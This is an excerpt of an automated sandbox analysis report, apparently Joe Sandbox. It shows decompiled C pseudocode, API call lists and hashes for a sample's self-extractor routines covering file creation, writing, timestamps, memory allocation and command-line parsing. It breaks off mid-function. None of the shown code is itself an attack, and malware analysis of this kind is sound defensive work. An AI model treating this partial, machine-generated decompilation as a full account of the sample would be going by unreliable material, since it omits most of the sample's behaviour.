                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AttributesFileItemText
                                                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                                                                                                                                                                                                              • API String ID: 3625706803-1610346413
                                                                                                                                                                                                                                              • Opcode ID: 3b606c3a7da5400857a81bd5af9c6fc243fb562a3936465cb1478895bf9195f0
                                                                                                                                                                                                                                              • Instruction ID: e6c28b35d744b6bfbc4402943e56f846e0c688139dc26bff7a8c5edb1f30131d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3b606c3a7da5400857a81bd5af9c6fc243fb562a3936465cb1478895bf9195f0
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2A4104366042039BCB25BF38DE486FA7BA5EB4D300F084669E88697285DA31DE4AC750
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E00A84C37(signed int __ecx, int __edx, int _a4) {
                                                                                                                                                                                                                                              				struct _FILETIME _v12;
                                                                                                                                                                                                                                              				struct _FILETIME _v20;
                                                                                                                                                                                                                                              				FILETIME* _t14;
                                                                                                                                                                                                                                              				int _t15;
                                                                                                                                                                                                                                              				signed int _t21;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t21 = __ecx * 0x18;
                                                                                                                                                                                                                                              				if( *((intOrPtr*)(_t21 + 0xa88d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
                                                                                                                                                                                                                                              					L5:
                                                                                                                                                                                                                                              					return 0;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_t14 =  &_v12;
                                                                                                                                                                                                                                              					_t15 = SetFileTime( *(_t21 + 0xa88d74), _t14, _t14, _t14); // executed
                                                                                                                                                                                                                                              					if(_t15 == 0) {
                                                                                                                                                                                                                                              						goto L5;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					return 1;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              			}









                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 00A84C54
                                                                                                                                                                                                                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00A84C66
                                                                                                                                                                                                                                              • SetFileTime.KERNELBASE(?,?,?,?), ref: 00A84C7E
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Time$File$DateLocal
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2071732420-0
                                                                                                                                                                                                                                              • Opcode ID: ece9ce1568510251e64da92922cf7db1c9e4fe31d662afa37dd77e7c10d8dd6b
                                                                                                                                                                                                                                              • Instruction ID: efb57c119644059dfafe509bc36b3cf3149c42a4b7dd71f39c10c44279835c03
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ece9ce1568510251e64da92922cf7db1c9e4fe31d662afa37dd77e7c10d8dd6b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2BF030B260120EAFAB64EFB5CC49DBB7BBDEB18240B44462BB915C1051EA34D924D7A1
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 75%
                                                                                                                                                                                                                                              			E00A8487A(CHAR* __ecx, signed int __edx) {
                                                                                                                                                                                                                                              				void* _t7;
                                                                                                                                                                                                                                              				CHAR* _t11;
                                                                                                                                                                                                                                              				long _t18;
                                                                                                                                                                                                                                              				long _t23;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t11 = __ecx;
                                                                                                                                                                                                                                              				asm("sbb edi, edi");
                                                                                                                                                                                                                                              				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
                                                                                                                                                                                                                                              				if((__edx & 0x00000100) == 0) {
                                                                                                                                                                                                                                              					asm("sbb esi, esi");
                                                                                                                                                                                                                                              					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					if((__edx & 0x00000400) == 0) {
                                                                                                                                                                                                                                              						asm("sbb esi, esi");
                                                                                                                                                                                                                                              						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						_t23 = 1;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
                                                                                                                                                                                                                                              				if(_t7 != 0xffffffff || _t23 == 3) {
                                                                                                                                                                                                                                              					return _t7;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					E00A8490C(_t11);
                                                                                                                                                                                                                                              					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              			}








                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,00A84A23,?,00A84F67,*MEMCAB,00008000,00000180), ref: 00A848DE
                                                                                                                                                                                                                                              • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,00A84F67,*MEMCAB,00008000,00000180), ref: 00A84902
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
• Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CreateFile
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                                                                                                                              • Opcode ID: 3e67c60750f0695c16f90ae4a8b9ce5671bc0b144ff9b851d4c99d07747eb452
                                                                                                                                                                                                                                              • Instruction ID: 191fba3171d170a4a7a6e17fb7e9f05ad8426fe622143ea56cf899114e6a13fb
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3e67c60750f0695c16f90ae4a8b9ce5671bc0b144ff9b851d4c99d07747eb452
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 29014BA3E1157126F324A1694C88FB7595CCB9A734F1B0335FDAAE71D1D5644C0483E0
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 93%
                                                                                                                                                                                                                                              			E00A84AD0(signed int _a4, void* _a8, long _a12) {
                                                                                                                                                                                                                                              				signed int _t9;
                                                                                                                                                                                                                                              				int _t12;
                                                                                                                                                                                                                                              				signed int _t14;
                                                                                                                                                                                                                                              				signed int _t15;
                                                                                                                                                                                                                                              				void* _t20;
                                                                                                                                                                                                                                              				struct HWND__* _t21;
                                                                                                                                                                                                                                              				signed int _t24;
                                                                                                                                                                                                                                              				signed int _t25;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t20 =  *0xa8858c; // 0x268
                                                                                                                                                                                                                                              				_t9 = E00A83680(_t20);
                                                                                                                                                                                                                                              				if( *0xa891d8 == 0) {
                                                                                                                                                                                                                                              					_push(_t24);
                                                                                                                                                                                                                                              					_t12 = WriteFile( *(0xa88d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
                                                                                                                                                                                                                                              					if(_t12 != 0) {
                                                                                                                                                                                                                                              						_t25 = _a12;
                                                                                                                                                                                                                                              						if(_t25 != 0xffffffff) {
                                                                                                                                                                                                                                              							_t14 =  *0xa89400; // 0x2e800
                                                                                                                                                                                                                                              							_t15 = _t14 + _t25;
                                                                                                                                                                                                                                              							 *0xa89400 = _t15;
                                                                                                                                                                                                                                              							if( *0xa88184 != 0) {
                                                                                                                                                                                                                                              								_t21 =  *0xa88584; // 0x0
                                                                                                                                                                                                                                              								if(_t21 != 0) {
                                                                                                                                                                                                                                              									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0xa893f8, 0);
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						_t25 = _t24 | 0xffffffff;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					return _t25;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					return _t9 | 0xffffffff;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              			}












APIs
  • Part of subcall function 00A83680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00A8369F
  • Part of subcall function 00A83680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00A836B2
  • Part of subcall function 00A83680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00A836DA
• WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00A84B05
Memory Dump Source
• Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
• Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
Similarity
• API ID: MessagePeek$FileMultipleObjectsWaitWrite
• String ID:
• API String ID: 1084409-0
• Opcode ID: 2fcd898ab06e94409357b31da27db38108e4dec4a520ecb9fe3a31ea1ee258ae
• Instruction ID: 2cc1b3f6e3881713e8b8e98b154fdc5ed1c32ab13707ad9b70ebfe47c31cf415
• Opcode Fuzzy Hash: 2fcd898ab06e94409357b31da27db38108e4dec4a520ecb9fe3a31ea1ee258ae
• Instruction Fuzzy Hash: EB019231640302ABDB14EF98DC09BA37769F748725F098225F9399B1F1CB70D812CB50
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00A8658A(char* __ecx, void* __edx, char* _a4) {
	intOrPtr _t4;
	char* _t6;
	char* _t8;
	void* _t10;
	void* _t12;
	char* _t16;
	intOrPtr* _t17;
	void* _t18;
	char* _t19;

	_t16 = __ecx;
	_t10 = __edx;
	_t17 = __ecx;
	_t1 = _t17 + 1; // 0xa88b3f
	_t12 = _t1;
	do {
		_t4 =  *_t17;
		_t17 = _t17 + 1;
	} while (_t4 != 0);
	_t18 = _t17 - _t12;
	_t2 = _t18 + 1; // 0xa88b40
	if(_t2 < __edx) {
		_t19 = _t18 + __ecx;
		if(_t19 > __ecx) {
			_t8 = CharPrevA(__ecx, _t19); // executed
			if( *_t8 != 0x5c) {
				 *_t19 = 0x5c;
				_t19 =  &(_t19[1]);
			}
		}
		_t6 = _a4;
		 *_t19 = 0;
		while( *_t6 == 0x20) {
			_t6 = _t6 + 1;
		}
		return E00A816B3(_t16, _t10, _t6);
	}
	return 0x8007007a;
}













                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CharPrevA.USER32(00A88B3E,00A88B3F,00000001,00A88B3E,-00000003,?,00A860EC,00A81140,?), ref: 00A865BA
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CharPrev
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 122130370-0
                                                                                                                                                                                                                                              • Opcode ID: b9e9bfbc1d2ea8449797dbd23ad9d83eff2508bfd02e07a399e10b0315d944d6
                                                                                                                                                                                                                                              • Instruction ID: 2e57dd47ae8dda3434567f0ab819ef2ac9a769a7b3449aa008e292c229c0fad6
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b9e9bfbc1d2ea8449797dbd23ad9d83eff2508bfd02e07a399e10b0315d944d6
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4CF04C321042509BF3397A1D9884B66BFDE9B86350F28016EE8DAC3205DA658C4683A0
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 93%
                                                                                                                                                                                                                                              			E00A8621E() {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				signed int _t5;
                                                                                                                                                                                                                                              				void* _t9;
                                                                                                                                                                                                                                              				void* _t13;
                                                                                                                                                                                                                                              				void* _t19;
                                                                                                                                                                                                                                              				void* _t20;
                                                                                                                                                                                                                                              				signed int _t21;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t5 =  *0xa88004; // 0xd891196d
                                                                                                                                                                                                                                              				_v8 = _t5 ^ _t21;
                                                                                                                                                                                                                                              				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                              					0x4f0 = 2;
                                                                                                                                                                                                                                              					_t9 = E00A8597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					E00A844B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                                                              					 *0xa89124 = E00A86285();
                                                                                                                                                                                                                                              					_t9 = 0;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return E00A86CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
                                                                                                                                                                                                                                              			}












                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00A8623F
                                                                                                                                                                                                                                                • Part of subcall function 00A844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A84518
                                                                                                                                                                                                                                                • Part of subcall function 00A844B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00A84554
                                                                                                                                                                                                                                                • Part of subcall function 00A86285: GetLastError.KERNEL32(00A85BBC), ref: 00A86285
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 381621628-0
                                                                                                                                                                                                                                              • Opcode ID: bd7ecc4280ebe9347eb5eb492a29fce9a0ab8500cae5ebcb74a76ab09b383bd7
                                                                                                                                                                                                                                              • Instruction ID: 77ad98409431bb8256fcdee499b8ac2bf38d7e98fb8c4defe516828881a827ee
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bd7ecc4280ebe9347eb5eb492a29fce9a0ab8500cae5ebcb74a76ab09b383bd7
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8FF0BEB0A04208ABE750FBB48E06BFA32BCDB54300F4000AAA986DA081EE749D458750
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E00A84B60(signed int _a4) {
                                                                                                                                                                                                                                              				signed int _t9;
                                                                                                                                                                                                                                              				signed int _t15;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t15 = _a4 * 0x18;
                                                                                                                                                                                                                                              				if( *((intOrPtr*)(_t15 + 0xa88d64)) != 1) {
                                                                                                                                                                                                                                              					_t9 = FindCloseChangeNotification( *(_t15 + 0xa88d74)); // executed
                                                                                                                                                                                                                                              					if(_t9 == 0) {
                                                                                                                                                                                                                                              						return _t9 | 0xffffffff;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					 *((intOrPtr*)(_t15 + 0xa88d60)) = 1;
                                                                                                                                                                                                                                              					return 0;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				 *((intOrPtr*)(_t15 + 0xa88d60)) = 1;
                                                                                                                                                                                                                                              				 *((intOrPtr*)(_t15 + 0xa88d68)) = 0;
                                                                                                                                                                                                                                              				 *((intOrPtr*)(_t15 + 0xa88d70)) = 0;
                                                                                                                                                                                                                                              				 *((intOrPtr*)(_t15 + 0xa88d6c)) = 0;
                                                                                                                                                                                                                                              				return 0;
                                                                                                                                                                                                                                              			}






                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,00A84FA1,00000000), ref: 00A84B98
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2591292051-0
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00A866AE(CHAR* __ecx) {
	unsigned int _t1;

	_t1 = GetFileAttributesA(__ecx); // executed
	if(_t1 != 0xffffffff) {
		return !(_t1 >> 4) & 0x00000001;
	} else {
		return 0;
	}
}

APIs
• GetFileAttributesA.KERNELBASE(?,00A84777,?,00A84E38,?), ref: 00A866B1
Memory Dump Source
• Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
• Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00A84CA0(long _a4) {
	void* _t2;

	_t2 = GlobalAlloc(0, _a4); // executed
	return _t2;
}

APIs
• GlobalAlloc.KERNELBASE(00000000,?), ref: 00A84CAA
Memory Dump Source
• Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
• Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
Similarity
• API ID: AllocGlobal
• String ID:
• API String ID: 3761449716-0
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00A84CC0(void* _a4) {
	void* _t2;

	_t2 = GlobalFree(_a4); // executed
	return _t2;
}

APIs
Memory Dump Source
• Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
• Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
Similarity
• API ID: FreeGlobal
• String ID:
• API String ID: 2979337801-0
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 92%
E00A85C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
	signed int _v8;
	signed int _v12;
	CHAR* _v265;
	char _v266;
	char _v267;
	char _v268;
	CHAR* _v272;
	char _v276;
	signed int _v296;
	char _v556;
	signed int _t61;
	int _t63;
	char _t67;
	CHAR* _t69;
	signed int _t71;
	void* _t75;
	char _t79;
                                                                                                                                                                                                                                              				void* _t83;
                                                                                                                                                                                                                                              				void* _t85;
                                                                                                                                                                                                                                              				void* _t87;
                                                                                                                                                                                                                                              				intOrPtr _t88;
                                                                                                                                                                                                                                              				void* _t100;
                                                                                                                                                                                                                                              				intOrPtr _t101;
                                                                                                                                                                                                                                              				CHAR* _t104;
                                                                                                                                                                                                                                              				intOrPtr _t105;
                                                                                                                                                                                                                                              				void* _t111;
                                                                                                                                                                                                                                              				void* _t115;
                                                                                                                                                                                                                                              				CHAR* _t118;
                                                                                                                                                                                                                                              				void* _t119;
                                                                                                                                                                                                                                              				void* _t127;
                                                                                                                                                                                                                                              				CHAR* _t129;
                                                                                                                                                                                                                                              				void* _t132;
                                                                                                                                                                                                                                              				void* _t142;
                                                                                                                                                                                                                                              				signed int _t143;
                                                                                                                                                                                                                                              				CHAR* _t144;
                                                                                                                                                                                                                                              				void* _t145;
                                                                                                                                                                                                                                              				void* _t146;
                                                                                                                                                                                                                                              				void* _t147;
                                                                                                                                                                                                                                              				void* _t149;
                                                                                                                                                                                                                                              				char _t155;
                                                                                                                                                                                                                                              				void* _t157;
                                                                                                                                                                                                                                              				void* _t162;
                                                                                                                                                                                                                                              				void* _t163;
                                                                                                                                                                                                                                              				char _t167;
                                                                                                                                                                                                                                              				char _t170;
                                                                                                                                                                                                                                              				CHAR* _t173;
                                                                                                                                                                                                                                              				void* _t177;
                                                                                                                                                                                                                                              				intOrPtr* _t183;
                                                                                                                                                                                                                                              				intOrPtr* _t192;
                                                                                                                                                                                                                                              				CHAR* _t199;
                                                                                                                                                                                                                                              				void* _t200;
                                                                                                                                                                                                                                              				CHAR* _t201;
                                                                                                                                                                                                                                              				void* _t205;
                                                                                                                                                                                                                                              				void* _t206;
                                                                                                                                                                                                                                              				int _t209;
                                                                                                                                                                                                                                              				void* _t210;
                                                                                                                                                                                                                                              				void* _t212;
                                                                                                                                                                                                                                              				void* _t213;
                                                                                                                                                                                                                                              				CHAR* _t218;
                                                                                                                                                                                                                                              				intOrPtr* _t219;
                                                                                                                                                                                                                                              				intOrPtr* _t220;
                                                                                                                                                                                                                                              				signed int _t221;
                                                                                                                                                                                                                                              				signed int _t223;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t173 = __ecx;
                                                                                                                                                                                                                                              				_t61 =  *0xa88004; // 0xd891196d
                                                                                                                                                                                                                                              				_v8 = _t61 ^ _t221;
                                                                                                                                                                                                                                              				_push(__ebx);
                                                                                                                                                                                                                                              				_push(__esi);
                                                                                                                                                                                                                                              				_push(__edi);
                                                                                                                                                                                                                                              				_t209 = 1;
                                                                                                                                                                                                                                              				if(__ecx == 0 ||  *__ecx == 0) {
                                                                                                                                                                                                                                              					_t63 = 1;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					L2:
                                                                                                                                                                                                                                              					while(_t209 != 0) {
                                                                                                                                                                                                                                              						_t67 =  *_t173;
                                                                                                                                                                                                                                              						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
                                                                                                                                                                                                                                              							_t173 = CharNextA(_t173);
                                                                                                                                                                                                                                              							continue;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_v272 = _t173;
                                                                                                                                                                                                                                              						if(_t67 == 0) {
                                                                                                                                                                                                                                              							break;
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_t69 = _v272;
                                                                                                                                                                                                                                              							_t177 = 0;
                                                                                                                                                                                                                                              							_t213 = 0;
                                                                                                                                                                                                                                              							_t163 = 0;
                                                                                                                                                                                                                                              							_t202 = 1;
                                                                                                                                                                                                                                              							do {
                                                                                                                                                                                                                                              								if(_t213 != 0) {
                                                                                                                                                                                                                                              									if(_t163 != 0) {
                                                                                                                                                                                                                                              										break;
                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                              										goto L21;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									_t69 =  *_t69;
                                                                                                                                                                                                                                              									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
                                                                                                                                                                                                                                              										break;
                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                              										_t69 = _v272;
                                                                                                                                                                                                                                              										L21:
                                                                                                                                                                                                                                              										_t155 =  *_t69;
                                                                                                                                                                                                                                              										if(_t155 != 0x22) {
                                                                                                                                                                                                                                              											if(_t202 >= 0x104) {
                                                                                                                                                                                                                                              												goto L106;
                                                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                                                              												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
                                                                                                                                                                                                                                              												_t177 = _t177 + 1;
                                                                                                                                                                                                                                              												_t202 = _t202 + 1;
                                                                                                                                                                                                                                              												_t157 = 1;
                                                                                                                                                                                                                                              												goto L30;
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              										} else {
                                                                                                                                                                                                                                              											if(_v272[1] == 0x22) {
